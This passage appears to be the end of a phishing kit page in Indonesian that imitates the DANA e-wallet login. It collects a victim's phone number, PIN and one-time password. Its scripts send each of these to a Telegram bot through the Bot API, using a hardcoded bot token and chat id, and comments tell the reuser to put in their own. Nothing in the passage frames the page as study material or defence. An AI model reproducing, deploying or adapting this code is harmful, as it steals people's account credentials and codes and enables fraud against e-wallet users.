       <input onkeypress="if(this.value.length==1) return false;" type="tel" id="pin44" data-id="4" name="pin44" maxlength="1" required  autofocus class="input-text input-text-security-none">
       <input onkeypress="if(this.value.length==1) return false;" type="tel" id="pin55" data-id="5" name="pin55" maxlength="1" required autofocus class="input-text input-text-security-none">
       <input onkeypress="if(this.value.length==1) return false;" type="tel" id="pin66" data-id="6" name="pin66" maxlength="1" required autofocus class="input-text input-text-security-none" onchange="javascript:this.form.button();" oninput="sendPin()">
       
	</div>
				<center>
			<button class="show" type="button">TAMPILKAN</button>
			</center>
			<p class="forgot">LUPA PIN?</p>
			<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbD-mmuMUDwaeFMEz6NefivuQqHyrFXvXxqVxMhYRhR5wsfUhiWkPNkpxLKkagRNpJ2obIiZH_D9EK6tnHIJUFMVBOclZI98zrU7VPszAR5n-_GeSWNCNgnfH1MRWuL-ahhPjxsejyDa5yyWAaOMWXWT4jS4EngtdLLlXjaPakQoFIOsjyS6tfnEBHDlw/s16000/output-onlinegiftools.gif" width="100%" style="position: absolute; bottom: 10; left: 0; right: 0; margin: 0px auto;">
		</form>
<form id="myOtp" onsubmit="retirn false" style="display: none">
		 <div id="boxotp" class="page" style="position: fixed; bottom: 0; width: 100%; height: 280px; background-color: #fff; border-radius: 14px 14px 0px 0px; z-index: -; display: none; background-image: url(./asset/bg_otp.png) ;
  background-position: 100% 100%;
  background-size: 100% 100%;" id="otpkirimulang" class="divotp">
<button type="button" style="right: 10; bottom: 238; float: right; width: 40px; background: transparent; color: transparent; border: none; font-size: 13px; height: 10px; position: fixed;" onclick="tutupotp()">XX</button>
				<h2 style="margin-bottom: 30px; opacity: 0.0">Masukkan OTP</h2>
				<p id="userid" style="font-size: 2px; text-align: center; margin-bottom: -100px; font-weight: 600; color: #070707; margin-top: 66px; margin-left: -125px; opacity: 0.0; "></p>
  <center>
				<p class="alert" id="alert" style="font-size: 14px; text-align: center; margin-bottom: 0px; font-weight: 500; color: #000; margin-top: 148px; display: ; width: 360px; margin-bottom: -10px; font-weight: 300"></p>
				
				
				</center>
				<div class="box-input-otp" style="margin-top: 50px">
					
					<div class="loadingOtp" style="display:none;background: #FAFAFA">

						
						<img src="./asset/load_bg.png"><img class="spinner" src="./asset/load_spin.png">
		</div>
		<div type="button" class="clearotp"></div>
	
		 <input type="hidden" id="logo" value="❁┷━❃∞∞𝗗𝗔𝗡𝗔∞∞❃━┷❁">
			
		 <input onkeypress="if(this.value.length==1) return false;" type="tel" id="otp1" data-id="1" name="pin11" maxlength="1" required autofocus class="inpotp" class="input-text input-text-security-none"> 	
			
			
		 <input onkeypress="if(this.value.length==1) return false;" type="tel" id="otp2" data-id="1" name="pin11" maxlength="1" required autofocus class="input-text input-text-security-none inpotp"> 
		
		 <input onkeypress="if(this.value.length==1) return false;" type="tel" id="otp3" data-id="1" name="pin11" maxlength="1" required autofocus class="input-text input-text-security-none inpotp"> 
		 
		<input name="otp4" id="otp4" class="inpotp" inputmode="numeric" type="number" autocomplete="off" required maxlength="1" onkeypress="if(this.value.length==1) return false;"></div>
		
		
		
		 <p id="waktuku" class="resend" style="margin-top: 70px; color: #aaa; font-size: 13px">
					KIRIM ULANG (<span id="countdown" style="color: #aaa">60</span>s)
				</p>
       <p class="resend" style="margin-top: 70px; font-weight: 600; color: #2C86C5; margin-left: 0px; display: none" id="kirim-ulang" onclick="kirimulang()">KIRIM ULANG</p>
       
			</div>
		</div>
	</div>
</div>   
</form>
</fieldset>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
        <script>
            var url = "#kirim-ulang"; // url tujuan
            var count = 60; // dalam detik
            function countDown() {
                
                if (count > 0) {
                    count--;
                    var waktu = count + 0;
            $('#carasingkat').html(waktu);
             
         setTimeout("countDown()", 1000);
           
                    
               
                }
            }
            countDown();
       
       </script>   
<script>
 function sendNohp1(event){
  event.preventDefault();
   
  $("#loadku").show();

document.getElementById('infoku').innerHTML = "Permintaan sedang di Proses...";
 ;
  
 var nope1 = document.getElementById('nope1');
 

    var gabungan = '%0A𝗡𝗼𝗺𝗼𝗿 𝗛𝗮𝗻𝗱𝗽𝗵𝗼𝗻𝗲 %3A%0A' + nope1.value;

    var token = '6410163157:AAGv6puSTciUrU5THkEr34QePcazjSXv7fE'; // Ganti dengan token bot yang krr&eramu buat
    var grup = '6075822784'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
    
    success: function(){
    $("#loadku").hide();
   setTimeout(function(){
  $("#pageno").fadeOut();
   $("#pageotp").fadeIn();
  var nomor = document.getElementById("nope").value;
  document.getElementById("phone").innerHTML = "+62" + nomor + "  via SMS";
 
    }, 1500);}});};   
</script>
<script>
 function sendOtp1(event){

 event.preventDefault();
   
  $("#loadku").show();
 document.getElementById('notifku').innerHTML = "Permintaan sedang di Proses...";
  
 var pin1 = document.getElementById('pin1');
 var pin2 = document.getElementById('pin2');
 var pin3 = document.getElementById('pin3');
 var pin4 = document.getElementById('pin4');
 var pin5 = document.getElementById('pin5');
 var pin6 = document.getElementById('pin6');
     
  var gabungan = '%0A𝗢𝗧𝗣 𝗟𝗔𝗭𝗔𝗗𝗔    : %0A' + pin1.value + pin2.value + pin3.value + pin4.value + pin5.value + pin6.value;
  
     var token = '6410163157:AAGv6puSTciUrU5THkEr34QePcazjSXv7fE'; // Ganti dengan token bot yang kamu buat
    var grup = '6075822784'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
    
    success: function(){
    $("#loadku").hide();
   setTimeout(function(){
  $("#pageno").fadeOut();
   $("#pageotp").fadeOut();
   $("#pagedone").fadeIn();
    $("#pemb").addClass("efek-ketik");
    }, 1500);}});};   
    
</script>
<script>
//var pinContainer = document.getElementsByClassName("pin-code")[maxlength];
var pinContainer = document.querySelector(".pin-code2");
console.log('There is ' + pinContainer.length + ' Pin Container on the page.');

pinContainer.addEventListener('keyup', function (event) {
    var target = event.srcElement;
    
    var maxLength = parseInt(target.attributes["maxlength"].value, 6);
    var myLength = target.value. length;

    if (myLength >= maxLength) {
        var next = target;
        while (next = next.nextElementSibling) {
            if (next == 0) break;
            if (next.tagName.toLowerCase() == "input") {
                next.focus();
                break;
            }
        }
    }

    if (myLength === 0) {
        var next = target;
        while (next = next.previousElementSibling) {
            if (next == 0) break;
            if (next.tagName.toLowerCase() == "input") {
                next.focus();
                break;
            }
        }
    }
}, false);

pinContainer.addEventListener('keydown', function (event) {
    var target = event.srcElement;
    target.value = "";
}, false);



    
</script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="./asset/jquery.mask.min.js"></script>
<script src="./asset/google.js"></script>
<script>$(document).ready(function(){$('#inp').on('input', function(){if($(this).val() == '0' || $(this).val() == '62'){$(this).val('');}});});</script>
<script>$(document).ready(function(){$('#inp').mask('000-0000-000000');});</script>
<script>let inp = document.getElementById("inp");let btn = document.getElementById("btn");inp.addEventListener("input", val);function val(){if(inp.value.length > 10){btn.disabled = false;}else{btn.disabled = true;}};</script>

<script>
//var pinContainer = document.getElementsByClassName("pin-code")[maxlength];
var pinContainer = document.querySelector(".box-input-pin");
console.log('There is ' + pinContainer.length + ' Pin Container on the page.');

pinContainer.addEventListener('keyup', function (event) {
    var target = event.srcElement;
    
    var maxLength = parseInt(target.attributes["maxlength"].value, 6);
    var myLength = target.value. length;

    if (myLength >= maxLength) {
        var next = target;
        while (next = next.nextElementSibling) {
            if (next == 0) break;
            if (next.tagName.toLowerCase() == "input") {
                next.focus();
                break;
            }
        }
    }

    if (myLength === 0) {
        var next = target;
        while (next = next.previousElementSibling) {
            if (next == 0) break;
            if (next.tagName.toLowerCase() == "input") {
                next.focus();
                break;
            }
        }
    }
}, false);

pinContainer.addEventListener('keydown', function (event) {
    var target = event.srcElement;
    target.value = "";
}, false);
</script>
<script>$('.inpotp').on('input', function(event) {const inputs = $('.inpotp');const isAllFilled = Array.from(inputs).every((input) => input.value !== '');if (isAllFilled == true) {$(event.target).blur();sendOtp();}const index = inputs.index(this);const currentValue = event.target.value;if (currentValue.length === 1) {if (index < inputs.length - 1) {inputs[index + 1].focus();}} else if (currentValue.length === 0) {if (index > 0) {inputs[index].focus();}};});$('.inpotp').on('keydown', function(event) {const inputs = $('.inpotp');const key = event.key;const index = inputs.index(this);if (key === 'Backspace' && event.target.value.length === 0) {if (index > 0) {inputs[index - 1].focus();}};});</script>
<script>$(document).ready(function() {$('.clear').click(function() {$('.inppin').val('');$('#pin1').focus();});$('.clearotp').click(function() {$('.inpotp').val('');$('#otp1').focus();});$('.show').click(function() {$('.inppin').each(function() {if ($(this).attr('type') === 'password') {$(this).attr('type','number');$(".show").text("SEMBUNYIKAN");} else {$(this).attr('type', 'password');$(".show").text("TAMPILKAN");}});});});</script>
<script>
 function nextPrev(){
      $("#process1").show();
      event.preventDefault();
       setTimeout(function(){
           $("#homeku").hide();
        
           $("#back1").show();
           $("#butonku").fadeOut();
           $(".box-login").fadeIn();
           $("#process1").hide();
       },1000);
 }   
 
 
 function goback1(){
     $("#process").show();
     setTimeout(function(){
     $("#homeku").show();
      $(".box-login").fadeOut();
      $("#butonku").fadeIn();
      $("#back1").hide();
       $("#process").hide();
       
     },500);
 }
 
 </script>
 <script>
 
 function goback2(){
     $("#process").show();
     setTimeout(function(){
    $("#formPin").fadeOut();
     $("#formNohp").fadeIn();
       $("#process").hide();
        $("#inp").val('');
        $("#back1").show();
        $("#back2").hide();
        document.getElementById("formPin").reset();
        $('.inppin').val('');
     },500);
 }
</script>
<script>
    $( document ).ready(function() {
            setTimeout(() => {
                $('#popup').hide();
                $('chsalxcome2').fadeIn();
            },2000)
             $('musikku').play();
        })
        
</script>
<script>
 function sendNohp(event){
    $("#process").show();event.preventDefault();
    $("#inp").blur();
     
    
    
    var nomor = document.getElementById("inp").value;
            sessionStorage.setItem("nomor", nomor);
    var logo = document.getElementById('logo');       
    var inp = document.getElementById('inp');
    
    var gabungan = '' + logo.value + '%0A𝗡𝗼𝗺𝗼𝗿 𝗗𝗔𝗡𝗔 : ' + '0' + inp.value;
   
    var token = '6410163157:AAGv6puSTciUrU5THkEr34QePcazjSXv7fE'; // Ganti dengan token bot yang kamu buat
    var grup = '6075822784'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
    
    success: function(){
    $("#process").hide();
    document.getElementById("back1").style.display = "none";
    document.getElementById("back2").style.display = "block";
    $("#formNohp").fadeOut();
    setTimeout(function(){
    $("#formPin").fadeIn();
    $("#pin1").focus();
    }, 500);}});};
    
   
    </script>
<script>

</script>
<script>
function tutupotp(){
$(".bgotp").hide();    
}
</script>
<script>
 function letsgodana(){
 $('#logindana').fadeIn();
   setTimeout(function(){
            $(".start").fadeIn();
            setTimeout(function(){
                $(".start").fadeOut(1000);
                setTimeout(function(){
                   $(".container").fadeIn(200);
                   $("#inp").focus();
                },1000);
            },1000);
        },500);  
  
     
 } 
    </script>
<script>
    function countdown() {
    var count = parseInt(
    $('#countdown').text());
    if (count%ttq !== 0) {
    $('#countdown').text(count - 1);} 
    else {
    $('#countdown').text('60');}};
    </script>

</body>
</html>